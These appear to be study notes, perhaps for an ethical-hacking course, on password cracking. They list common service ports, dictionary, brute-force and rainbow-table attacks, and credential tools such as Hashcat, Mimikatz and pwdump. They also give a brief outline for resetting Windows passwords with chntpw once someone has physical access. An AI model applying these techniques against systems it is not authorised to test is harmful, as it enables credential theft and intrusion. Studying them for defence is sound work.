○ KerbCrack - Built-in sniffer and password cracker looking for Kerberos traffic on port 88
○ ScoopLM - Specifically looks for Windows authentication traffic on the wire and has a password cracker

Service   Port
FTP       20/21
TELNET    23
SMTP      25
HTTP      80
POP3      110
IMAPv4    143
NetBIOS   139,445
SNMP      161,162
SQLnet    1521

Offline - when the hacker steals a copy of the password file (plaintext or hashes) and does the cracking on a separate system.

• Dictionary Attack - uses a word list to attack the password. Fastest method of attacking
○ Wordlists - A wordlist or password dictionary is a collection of passwords stored in plain text. It's basically a text file with a bunch of passwords in it. One popular example of a wordlist is rockyou.txt, containing 14,341,564 unique passwords.
○ You can also generate your own wordlist with given parameters like length, combining letters and numbers, profiling, etc.
▪ Tools for generating wordlists:
□ CeWL
□ crunch
• Brute force attack - Tries every combination of characters to crack a password
○ Can be faster if you know parameters (such as at least 7 characters, must contain a special character, etc.)
• Rainbow tables - Uses pre-hashed passwords to compare against a password hash. Faster because the hashes are already computed.
• Tools for cracking password files (CLI):
○ John the Ripper - Works on Unix, Windows and Kerberos; compatible with MySQL, LDAP and MD4.
○ Hashcat - Advanced password recovery tool; supports a large number of hash modes covering OSes, documents, password managers and more (MD5, SHA family, RIPEMD, NTLM, LM, BitLocker, OS X, salted or iterated MD5, and the list goes on).

• Tools for cracking password files (GUI):
○ Cain & Abel - Windows software; cracks password hashes (LM, NTLM), sniffs network packets for passwords, recovers locally stored passwords, etc.
○ L0phtCrack - Paid software; extracts and cracks hashes; uses brute force or dictionary attack.
○ Ophcrack - Free and open source; cracks Windows log-in passwords by using LM hashes through rainbow tables.
○ RainbowCrack - Rainbow table generator for password cracking
○ Legion - Automates password guessing in NetBIOS sessions. Legion scans multiple IP address ranges for Windows shares and also offers a manual dictionary attack tool.
○ KerbCrack - Cracks Kerberos passwords.
○ Mimikatz - Steals credentials and escalates privileges (Windows NTLM hashes and Kerberos tickets (Golden Ticket attack); 'pass-the-hash' and 'pass-the-ticket').
○ fgdump - Dumps SAM databases on Windows machines.
○ Pwdump7 - Dumps SAM databases on Windows machines.

• CHNTPW - chntpw is a software utility for resetting or blanking local passwords used by Windows NT, 2000, XP, Vista, 7, 8, 8.1 and 10. It does this by editing the SAM database where Windows stores password hashes.

1. Physical access to the victim's computer
2. Boot into the BIOS and enable booting from CD or USB
3. Modify the SAM user account information with chntpw

The SAM is a database file. It stores users' passwords in a hashed format (LM hash and NTLM hash). Because a hash function is one way, this provides some measure of security for the storage of the passwords.

The SAM file is stored in a location that only users with high privileges can access.

• Length of passwords is good against brute-force attacks.
• Password complexity is good against dictionary attacks.

45
27 August 2024 11:15
